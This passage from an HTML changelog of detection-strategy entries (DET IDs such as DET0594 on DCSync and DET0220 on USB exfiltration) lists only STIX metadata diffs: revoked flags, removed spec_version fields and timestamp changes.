black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-23T17:54:46.514Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-23 17:54:46.514000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-11-12T22:03:39.105Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0839] Detection of Stage Capabilities</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0342] Detection of Suspicious Compiled HTML File Execution via hh.exe</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0441] Detection of Suspicious Scheduled Task Creation and Execution on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0320] Detection of System Network Connections Discovery Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0571] Detection of System Process Creation or Modification Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0483] Detection of System Service Discovery Commands Across OS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0253] Detection of Systemd Service Creation or Modification on Linux</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0471] Detection of Tainted Content Written to Shared Storage</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0816] Detection of Threat Intel Vendors</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0852] Detection of Tool</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0458] Detection of Trust Relationship Modifications in Domain or Tenant Policies</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0220] Detection of USB-Based Data Exfiltration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0594] Detection of Unauthorized DCSync Operations via Replication API Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0306] Detection of Unauthorized Network Firewall Rule Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:26:54.885Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0824] Detection of Upload Malware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0834] Detection of Upload Tool</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: 